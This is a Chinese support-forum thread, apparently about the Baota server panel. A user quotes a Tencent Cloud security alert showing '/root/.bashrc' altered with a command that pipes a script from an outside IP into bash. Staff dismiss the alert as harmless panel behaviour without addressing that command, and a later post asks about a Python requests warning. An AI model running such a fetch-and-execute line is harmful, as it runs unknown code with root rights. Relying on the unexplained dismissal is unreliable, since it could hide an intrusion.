【已完成】腾讯云主机安全监测到python下有高危漏洞
本帖最后由 堡塔运维小林 于 2023-10-31 11:18 编辑为了能快速了解并处理您的问题,请提供以下基础信息:面板、插件版本:8.0.3
系统版本:CentOS 7.9.2009 x86_64(Py3.7.9)
问题描述:检测到(命中规则名称:系统策略-篡改用户配置,进程路径:/www/server/panel/pyenv/bin/python3.7,文件路径:/root/.bashrc)核心文件存在威胁行为,告警数量:1,威胁等级:高危bash -c curl 119.45.155.12/7LvMgjN2.sh | bash
相关截图(日志、错误):
您好,感谢您的反馈,该问题已经反馈给开发这边了,这个并不是高危漏洞,是面板程序会刷新/root/.bashrc文件导致的,因为面板的php的环境变量是配置在这个文件里面,所以会出现这个情况,您可以忽略该告警,并不是真正的高危漏洞或者是被入侵了 我就是碰到这个问题,升级了面板的Python以后,从腾讯云OrcaTerm登录时,提示:
/www/server/panel/pyenv/lib/python3.7/site-packages/requests/__init__.py:104: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.12) doesn't match a supported version!
RequestsDependencyWarning)
请问如何解决?
页:
[1]